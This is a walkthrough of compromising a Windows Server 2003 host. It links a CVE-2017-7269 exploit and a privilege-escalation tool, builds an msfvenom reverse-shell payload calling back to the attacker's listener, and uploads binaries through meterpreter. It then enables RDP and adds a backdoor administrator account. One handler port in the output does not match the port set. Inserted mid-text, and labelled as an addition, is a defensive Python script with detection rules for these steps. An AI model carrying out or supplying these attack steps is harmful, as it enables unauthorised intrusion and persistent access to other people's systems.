Privilege escalation tool download: https://www.lanzous.com/iaq7egd
Target: Windows Server 2003 R2
EXP: https://github.com/zcgonvh/cve-2017-7269
Import the EXP into Metasploit
Start MSF
Try to load the exploit module
The module cannot be found. This is because msf does not accept "-" in module names; rename the file so the "-" becomes an underscore and it loads.
Restart the program
The exploit module now loads successfully
View the parameters that need to be set
Set the parameters
Load the payload
Start the exploit
The exploit succeeds and we get a shell
Generate the payload
<code>root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.136 LPORT=6666 -f exe -o system.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: system.exe</code>
Try privilege escalation
Testing shows that the root directory is writable
Upload the privilege escalation files
<code>meterpreter > upload "/root/pr.exe" c:\\shell
[*] uploading : /root/pr.exe -> c:\shell
[*] uploaded : /root/pr.exe -> c:\shell\pr.exe
meterpreter > upload "/root/system.exe" c:\\shell
[*] uploading : /root/system.exe -> c:\shell
[*] uploaded : /root/system.exe -> c:\shell\system.exe
meterpreter ></code>
Open another msfconsole and start a listener
<code>msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.52.136
lhost => 192.168.52.136
msf5 exploit(multi/handler) > set lport 6666
lport => 6988
msf5 exploit(multi/handler) > exploit</code>
Run the privilege escalation program
A shell is returned to the listener
We now have the highest privileges
Use the following command to open port 3389
<code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</code>
Use netstat -an to check whether the port is now open
Add an administrator account
<code>C:\shell>pr.exe "net user hack !123 /add"
pr.exe "net user hack !123 /add"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1796
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net user hack !123 /add</code>
Add the account to the administrators group
<code>C:\shell>pr.exe "net localgroup administrators hack /add"
pr.exe "net localgroup administrators hack /add"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1796
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net localgroup administrators hack /add
命令成功完成。</code>
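From the defender's side, every post-exploitation step shown above (a dropped binary running as SYSTEM from C:\shell, `net user ... /add`, `net localgroup administrators ... /add`, and `fDenyTSConnections` being set to 0 to switch on RDP) leaves a process-creation record. The script below is an added example, not part of this walkthrough or of the pr.exe tool; it runs a few detection rules over constructed sample records in an assumed "account | image | command line" format (a simplified stand-in for Security event 4688 or Sysmon event 1 fields) and correlates the account-creation and group-addition events into a "new local administrator" alert.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str      # which detection fired
    account: str   # account that ran the process
    detail: str    # what triggered it: created account, image path or command line


# Constructed sample records in the assumed "account | image | command line" format.
# The first four mirror what the SYSTEM shell in this walkthrough executes; the last
# two are routine administrative activity that must not be flagged.
SAMPLE_LOGS = [
    r'SYSTEM | C:\shell\pr.exe | pr.exe "net user hack !123 /add"',
    r'SYSTEM | C:\Windows\System32\net.exe | net user hack !123 /add',
    r'SYSTEM | C:\Windows\System32\net.exe | net localgroup administrators hack /add',
    r'SYSTEM | C:\Windows\System32\reg.exe | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f',
    r'alice | C:\Windows\System32\net.exe | net use Z: \\fileserver\share',
    r'bob | C:\Windows\System32\reg.exe | reg query HKLM\SOFTWARE\Microsoft',
]

# net user <name> [<password>] /add  -> a local account is being created (net1 alias too)
LOCAL_USER_ADD = re.compile(r"\bnet1?\s+user\s+(?P<acct>\S+)(?:\s+\S+)?\s+/add\b", re.I)
# net localgroup administrators <name> /add  -> an account is being made a local admin
ADMIN_GROUP_ADD = re.compile(r"\bnet1?\s+localgroup\s+administrators\s+(?P<acct>\S+)\s+/add\b", re.I)
# fDenyTSConnections written as 0 (any number of zeros) -> Remote Desktop is being enabled
RDP_ENABLE = re.compile(r"fDenyTSConnections\b.*?/d\s+0+(?:\s|$)", re.I)

SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}


def scan_record(line: str) -> list[Finding]:
    """Apply every rule to one record and return the findings it produces."""
    parts = [p.strip() for p in line.split("|", 2)]
    if len(parts) != 3:
        return []  # malformed record: skip it rather than abort the whole scan
    account, image, cmdline = parts
    findings = []
    # SYSTEM running an image outside C:\Windows is unusual on a server; in this
    # walkthrough it is the dropped pr.exe in C:\shell holding a SYSTEM token.
    if account.upper() in SYSTEM_ACCOUNTS and not image.lower().startswith("c:\\windows\\"):
        findings.append(Finding("system_outside_windows", account, image))
    m = LOCAL_USER_ADD.search(cmdline)
    if m:
        findings.append(Finding("local_user_add", account, m.group("acct")))
    m = ADMIN_GROUP_ADD.search(cmdline)
    if m:
        findings.append(Finding("admin_group_add", account, m.group("acct")))
    if RDP_ENABLE.search(cmdline):
        findings.append(Finding("rdp_enable", account, cmdline))
    return findings


def scan(lines) -> list[Finding]:
    """Scan a sequence of records and collect all findings in order."""
    return [f for line in lines for f in scan_record(line)]


def new_admin_accounts(findings) -> set[str]:
    """Accounts that were both created and added to Administrators in the same scan."""
    created = {f.detail for f in findings if f.rule == "local_user_add"}
    promoted = {f.detail for f in findings if f.rule == "admin_group_add"}
    return created & promoted


if __name__ == "__main__":
    results = scan(SAMPLE_LOGS)
    for f in results:
        print(f"[{f.rule}] account={f.account} detail={f.detail}")
    print("new local administrators:", new_admin_accounts(results))
```

The rules are case-insensitive and accept the `net1` alias because both are trivial ways to slip past an exact-string match; the `fDenyTSConnections` rule matches any run of zeros so that `/d 0` and `/d 00000000` are treated alike. On the sample data the two benign records produce no findings, the four hostile ones produce five, and the correlation step reports `hack` as a newly created local administrator.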
Start Remote Desktop Connection
Enter the target IP
Then enter the administrator account and password we created